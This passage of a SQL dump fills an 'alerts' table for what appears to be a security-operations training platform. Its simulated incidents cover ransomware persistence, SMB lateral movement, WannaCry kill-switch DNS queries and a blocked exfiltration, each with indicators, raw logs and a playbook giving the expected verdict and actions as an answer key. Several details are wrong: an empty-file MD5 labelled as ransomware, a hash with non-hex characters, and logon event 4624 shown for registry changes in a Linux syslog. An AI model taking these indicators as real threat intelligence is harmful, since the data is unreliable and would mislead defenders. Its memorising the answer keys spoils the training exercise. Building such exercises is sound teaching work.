Network\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash matches known ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Filename commonly associated with ransomware 
attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.123Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:25:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"registry_key_modified\\\":\\\"HKEY_CURRENT_USER\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"scheduled_task_created\\\":\\\"\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\MaliciousTask\\\",\\\"malware_file\\\":\\\"ransomware_payload.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"description\\\":\\\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(510, 'SMB Propagation Detected', 'high', 'Network Traffic Analysis', 'A potential lateral movement was detected on the network using the SMB protocol. An internal host is attempting to spread ransomware to other vulnerable machines within the network.', 'Lateral Movement', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:22Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.23\",\"external_attacker_ip\":\"203.0.113.45\",\"protocol\":\"SMB\",\"malware_hash\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"malware_filename\":\"ransomware_payload.exe\",\"username\":\"jdoe\",\"activity\":\"smb_connection_attempt\",\"status\":\"failed\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential source of lateral movement within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"internal\",\"details\":\"Potential target of lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP used in previous ransomware attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f2e9b8b5d5f3a2b1c4e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known ransomware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"malicious\",\"details\":\"Executable associated with ransomware 
propagation.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal assessment\",\"verdict\":\"suspicious\",\"details\":\"User potentially compromised for lateral movement activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(511, 'Kill-Switch Domain Investigated', 'high', 'DNS Query Logs', 'An investigation has identified suspicious DNS queries related to the WannaCry kill-switch mechanism. The queries originated from an internal host querying a known kill-switch domain, indicating potential infection or reconnaissance activity.', 'Command and Control', 'T1071.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:30Z\",\"source_ip\":\"192.168.1.105\",\"queried_domain\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"query_type\":\"A\",\"response\":\"92.242.132.24\",\"associated_filename\":\"wannacry.exe\",\"associated_hash\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"internal_user\":\"jdoe\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_review\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known kill-switch domain for WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"Executable known to be associated with WannaCry ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 
'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.126Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:45:30Z\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"queried_domain\\\":\\\"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\\\",\\\"query_type\\\":\\\"A\\\",\\\"response\\\":\\\"92.242.132.24\\\",\\\"associated_filename\\\":\\\"wannacry.exe\\\",\\\"associated_hash\\\":\\\"e9f8425d4f8c5f8c5e7a7f8c5d7f9c3b\\\",\\\"internal_user\\\":\\\"jdoe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(512, 'Encryption Logic Analysis', 'high', 'File System Analysis', 'Analysts are examining the encryption logic of a ransomware strain to determine if there are any exploitable flaws that could allow decryption without payment. The analysis has identified several encrypted files and potential indicators of compromise.', 'Data Encryption', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"FS123456789\",\"user\":\"jdoe\",\"source_ip\":\"10.0.0.15\",\"attacker_ip\":\"203.0.113.45\",\"filename\":\"encrypted_document.docx\",\"malware_hash\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"encryption_algorithm\":\"AES-256\",\"process\":\"ransomware.exe\",\"internal_network\":\"192.168.1.0/24\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ransomware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of ransomware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_document.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File is encrypted and cannot be opened without a decryption key.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee user account potentially impacted.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.127Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:35:00Z\\\",\\\"event_id\\\":\\\"FS123456789\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"encrypted_document.docx\\\",\\\"malware_hash\\\":\\\"3f3f9d2c9c3d4e2b8e4f9b2a19e0b3d0\\\",\\\"encryption_algorithm\\\":\\\"AES-256\\\",\\\"process\\\":\\\"ransomware.exe\\\",\\\"internal_network\\\":\\\"192.168.1.0/24\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(513, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention (DLP) System', 'An advanced attempt to exfiltrate sensitive data was detected. Before encrypting files, the attacker tried to send critical company data to an external server.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:35Z\",\"event_type\":\"data_exfiltration_attempt\",\"src_ip\":\"192.168.1.105\",\"dest_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file\":\"financial_report_q3_2023.xlsx\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"protocol\":\"HTTPS\",\"action\":\"blocked\",\"alert_id\":\"DLP-20231010-001\",\"message\":\"Sensitive data transfer attempt detected and blocked by DLP.\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address from company network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with data exfiltration campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Registered employee username.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Database\",\"verdict\":\"clean\",\"details\":\"Legitimate company file.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with suspicious 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.128Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration_attempt\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dest_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"file\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"blocked\\\",\\\"alert_id\\\":\\\"DLP-20231010-001\\\",\\\"message\\\":\\\"Sensitive data transfer attempt detected and blocked by DLP.\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
